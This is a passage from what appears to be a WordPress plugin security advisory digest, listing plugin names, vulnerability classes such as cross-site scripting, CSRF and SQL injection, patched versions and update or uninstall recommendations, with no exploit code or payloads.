Recommended Action: Update to version 3.0.6.2, or a newer patched version

Plugin: Efí Bank

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WooCommerce Builder & Gutenberg WooCommerce Blocks – WowStore

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Custom Simple Rss

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: WP Backup Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Podcast Importer SecondLine

Vulnerability: Server-Side Request Forgery
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: ImageRecycle pdf & image compression

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.11
Recommended Action: Update to version 3.1.11, or a newer patched version

Plugin: WP Donate

Vulnerability: SQL Injection
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: WP Shop

Vulnerability: Missing Authentication to Settings Change and Order Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smart Online Order for Clover

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Website Monetization by MageNet

Vulnerability: Cross-Site Request Forgery via admin_magenet_settings
Patched Version: 1.0.29.2
Recommended Action: Update to version 1.0.29.2, or a newer patched version

Plugin: Ajax Search Lite – Live Search & Filter

Vulnerability: Missing Authorization leading to Authenticated (Subscriber+) Sensitive Information Disclosure
Patched Version: 4.11
Recommended Action: Update to version 4.11, or a newer patched version

Plugin: Admin Custom Login

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 2.4.8
Recommended Action: Update to version 2.4.8, or a newer patched version

Plugin: WP Maintenance

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: Advanced Dewplayer

Vulnerability: Directory Traversal
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: iQ Block Country

Vulnerability: Protection Bypass due to IP Spoofing
Patched Version: 1.2.17
Recommended Action: Update to version 1.2.17, or a newer patched version

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.12
Recommended Action: Update to version 3.8.12, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs – My Sticky Elements

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Monetize

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Appointments

Vulnerability: Cross-Site Scripting
Patched Version: 1.12.0
Recommended Action: Update to version 1.12.0, or a newer patched version

Plugin: Under Construction, Coming Soon & Maintenance Mode

Vulnerability: Server-Side Request Forgery
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.6.4
Recommended Action: Update to version 3.6.4, or a newer patched version

Plugin: File Away

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quotes for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Email Subscription Popup

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.19
Recommended Action: Update to version 1.2.19, or a newer patched version

Plugin: spam-byebye

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: WooCommerce Help Scout

Vulnerability: Arbitrary File Upload to Remote Code Execution
Patched Version: 2.9.2
Recommended Action: Update to version 2.9.2, or a newer patched version

Plugin: Access Demo Importer

Vulnerability: Cross-Site Request Forgery to Data Reset
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Media from FTP

Vulnerability: Improper Privilege Management
Patched Version: 11.16
Recommended Action: Update to version 11.16, or a newer patched version

Plugin: Autoptimize

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: EmbedPress – Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Plugin Settings Delete via admin_post_remove and remove_private_data
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: NOO Timetable

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Church Admin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2550
Recommended Action: Update to version 1.2550, or a newer patched version

Plugin: OneTone Companion

Vulnerability: Open Mailer
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FooGallery – Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Arbitrary Usermeta Update to Authenticated (Author+) Privilege Escalation
Patched Version: 7.9.9
Recommended Action: Update to version 7.9.9, or a newer patched version

Plugin: FloLaunch

Vulnerability: Missing Authorization
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Subscriptions & Memberships for PayPal

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Core Web Vitals & PageSpeed Booster

Vulnerability: Open Redirect via _wp_http_referer
Patched Version: 1.0.13
Recommended Action: Update to version 1.0.13, or a newer patched version

Plugin: WP Post Popup

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NewStatPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: ElementsKit Elementor addons

Vulnerability: Missing Authorization
Patched Version: 2.9.2
Recommended Action: Update to version 2.9.2, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: WP-Picasa-Image

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Docs

Vulnerability: Cross-Site Request Forgery to folder management
Patched Version: 1.9.9
Recommended Action: Update to version 1.9.9, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Missing Authorization
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Coupon Referral Program

Vulnerability: Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Digital Goods for WooCommerce Checkout

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: WooCommerce Ninja Forms Product Add-ons

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Donations

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ShiftThis

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Comments by Startbit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form Clean and Simple

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.7.1
Recommended Action: Update to version 4.7.1, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Unauthenticated SQL Injection
Patched Version: 9.2.6
Recommended Action: Update to version 9.2.6, or a newer patched version

Plugin: Two Factor Authentication (2FA , MFA, OTP SMS and Email)

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Finale Lite – Sales Countdown Timer & Discount for WooCommerce

Vulnerability: Authenticated Arbitrary File Upload
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: Kiwiz – Certification de facturation – Woocommerce

Vulnerability: Certification de facturation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Log

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.8
Recommended Action: Update to version 2.4.8, or a newer patched version

Plugin: Easy PayPal Shopping Cart

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Header Footer Code Manager

Vulnerability: Cross-Site Request Forgery via process_bulk_action
Patched Version: 1.1.35
Recommended Action: Update to version 1.1.35, or a newer patched version

Plugin: WordPress Header Builder Plugin – Pearl

Vulnerability: Cross-Site Request Forgery via stm_save_hb_settings
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Bulk Resize Media

Vulnerability: Cross-Site Request Forgery via bulk_resize_resize_image
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Anti-Spam: Spam Protection | Block Spam Users, Comments, Forms

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2022.6
Recommended Action: Update to version 2022.6, or a newer patched version

Plugin: WP-Table Reloaded

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Booster Elite for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Cybersoldier

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Nelio AB Testing

Vulnerability: Server-Side Request Forgery
Patched Version: 4.5.11
Recommended Action: Update to version 4.5.11, or a newer patched version

Plugin: DMSGuestbook

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.0
Recommended Action: Update to version 1.9.0, or a newer patched version

Plugin: Image Slider

Vulnerability: SQL Injection
Patched Version: 1.1.97
Recommended Action: Update to version 1.1.97, or a newer patched version

Plugin: PWA for WP & AMP

Vulnerability: Arbitrary File Upload
Patched Version: 1.7.33
Recommended Action: Update to version 1.7.33, or a newer patched version

Plugin: PowerPack Elementor Addons (Free Widgets, Extensions and Templates)

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Drag and Drop Multiple File Upload PRO – Contact Form 7 Standard

Vulnerability: Contact Form 7 Standard <= 5.0.6.3 and <= 2.11.0
Patched Version: 2.11.1
Recommended Action: Update to one of the following versions, or a newer patched version: 2.11.1, 5.0.6.4

Plugin: WPBakery Page Builder Addons by Livemesh

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: FlightLog

Vulnerability: Authenticated (Editor+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hermit 音乐播放器

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Add to Calendar Button

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Amelia < 1.0.47
Patched Version: 1.0.47
Recommended Action: Update to version 1.0.47, or a newer patched version

Plugin: DoFollow Case by Case

Vulnerability: No subtitle
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Plugin: Rate My Post – Star Rating Plugin by FeedbackWP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3.9
Recommended Action: Update to version 3.3.9, or a newer patched version

Plugin: AN_GradeBook

Vulnerability: Authenticated (Subscriber+) SQL Injection via ‘id’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BSK PDF Manager

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: Captcha for WordPress

Vulnerability: Captcha Bypass
Patched Version: 1.11.4
Recommended Action: Update to version 1.11.4, or a newer patched version

Plugin: Mobile Events Manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Booster Elementor Addons

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Woodmart Core

Vulnerability: Authentication Bypass to Privilege Escalation
Patched Version: 1.0.37
Recommended Action: Update to version 1.0.37, or a newer patched version

Plugin: RokMicroNews

Vulnerability: Multiple Vulnerabilities
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Responsive CSS EDITOR

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Auto Affiliate Links

Vulnerability: Cross-Site Request Forgery via aalChangeOptions function
Patched Version: 6.3.0.3
Recommended Action: Update to version 6.3.0.3, or a newer patched version

Plugin: Royal Custom CSS for Page and Post

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CPT Shortcode Generator

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Perfmatters

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Baggage Freight Shipping Australia

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 360 Product Rotation

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Privilege Escalation
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Events Made Easy

Vulnerability: SQL Injection
Patched Version: 2.2.81
Recommended Action: Update to version 2.2.81, or a newer patched version

Plugin: Master Addons – Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations

Vulnerability: Missing Authorization
Patched Version: 2.0.5.4.1
Recommended Action: Update to version 2.0.5.4.1, or a newer patched version

Plugin: Snap Pixel

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Unlimited PopUps

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Event List

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 0.7.10
Recommended Action: Update to version 0.7.10, or a newer patched version

Plugin: Role Scoper (Obsolete – Please install PublishPress Permissions)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.65
Recommended Action: Update to version 1.3.65, or a newer patched version

Plugin: Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Featured Post Creative

Vulnerability: Missing Authorization via wpfp_update_featured_post
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: WP DSGVO Tools (GDPR)

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.19
Recommended Action: Update to version 2.2.19, or a newer patched version

Plugin: WordPress Integrator

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Gallery with Slideshow Plugin

Vulnerability: SQL Injection via gallery_name
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: XO Security

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: User Meta Manager

Vulnerability: Privilege Escalation
Patched Version: 3.4.7
Recommended Action: Update to version 3.4.7, or a newer patched version

Plugin: All In One Login — WordPress Login Security Plugin to Protect and Customize WP Admin

Vulnerability: Missing Authorization Checks
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: MW WP Form

Vulnerability: Missing Authorization
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: FormBuilder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.06
Recommended Action: Update to version 1.06, or a newer patched version

Plugin: WP Activity Log

Vulnerability: 2.4.3
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: Ocean Extra

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: WP Humans.txt

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Zotpress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.3.4
Recommended Action: Update to version 7.3.4, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Cross-Site Scripting
Patched Version: 1.14.0.3
Recommended Action: Update to version 1.14.0.3, or a newer patched version

Plugin: WP-dTree

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Site Reviews

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.17.3
Recommended Action: Update to version 5.17.3, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Arbitrary File Deletion/Read
Patched Version: 2.0.46
Recommended Action: Update to version 2.0.46, or a newer patched version

Plugin: Uncanny Toolkit for LearnDash

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.6.4
Recommended Action: Update to version 3.6.4, or a newer patched version

Plugin: Unlimited PopUps

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Lucky Wheel for WooCommerce – Spin a Sale

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Authenticated SQL Injection
Patched Version: 4.5.1
Recommended Action: Update to version 4.5.1, or a newer patched version

Plugin: bbPress Move Topics

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Multiple Unprotected AJAX Actions
Patched Version: 3.8.12
Recommended Action: Update to version 3.8.12, or a newer patched version

Plugin: Contact Form Builder by vcita

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ads by datafeedr.com

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Schedule Posts Calendar

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via admin settings
Patched Version: 5.3
Recommended Action: Update to version 5.3, or a newer patched version

Plugin: Minimal Coming Soon – Coming Soon Page

Vulnerability: Missing Authorization
Patched Version: 2.15
Recommended Action: Update to version 2.15, or a newer patched version

Plugin: Bookshelf

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: View All Post's Pages

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.9.1
Recommended Action: Update to version 0.9.1, or a newer patched version

Plugin: WP Job Manager

Vulnerability: PHP Object Injection
Patched Version: 1.29.3
Recommended Action: Update to version 1.29.3, or a newer patched version

Plugin: Recently viewed and most viewed products

Vulnerability: Authenticated (Shop Manager+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Export All Posts, Products, Orders, Refunds & Users

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Coming Soon Page & Maintenance Mode

Vulnerability: Unauthenticated Settings Reset
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Restrict – membership, site, content and user access restrictions for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Simple Slideshow Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Stop Spam Comments

Vulnerability: Protection Mechanism Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: File Manager

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Unconfirmed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Car Dealer (Dealership) and Vehicle sales

Vulnerability: Missing Authorization to Arbitrary Plugin Installation
Patched Version: 3.05
Recommended Action: Update to version 3.05, or a newer patched version

Plugin: WP Review Slider

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 12.8
Recommended Action: Update to version 12.8, or a newer patched version

Plugin: Search Everything

Vulnerability: SQL Injection
Patched Version: 8.1.6
Recommended Action: Update to version 8.1.6, or a newer patched version

Plugin: WP Plugin Manager – Deactivate plugins per page

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Role Based Pricing for WooCommerce

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Easy Bootstrap Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Table of Contents Plus

Vulnerability: Cross-Site Request Forgery
Patched Version: 2309
Recommended Action: Update to version 2309, or a newer patched version

Plugin: Relevanssi – A Better Search

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: SpeakOut! Email Petitions

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: RSS Feed Retriever

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.13.52
Recommended Action: Update to version 7.13.52, or a newer patched version

Plugin: WP GPX Maps

Vulnerability: Missing Authorization
Patched Version: 1.7.06
Recommended Action: Update to version 1.7.06, or a newer patched version

Plugin: WP125

Vulnerability: Cross-Site Request Forgery to Arbitrary Ad Deletion
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Dewplayer

Vulnerability: Content Spoofing/Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bitcoin / AltCoin Payment Gateway for WooCommerce & Multivendor store / shop

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Contact Bank – Contact Form Builder for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.23
Recommended Action: Update to version 2.1.23, or a newer patched version

Plugin: Store Locator WordPress

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 21.3
Recommended Action: Update to version 21.3, or a newer patched version

Plugin: Careerfy

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Yotpo Reviews for WooCommerce (Unofficial)

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: No patched version available
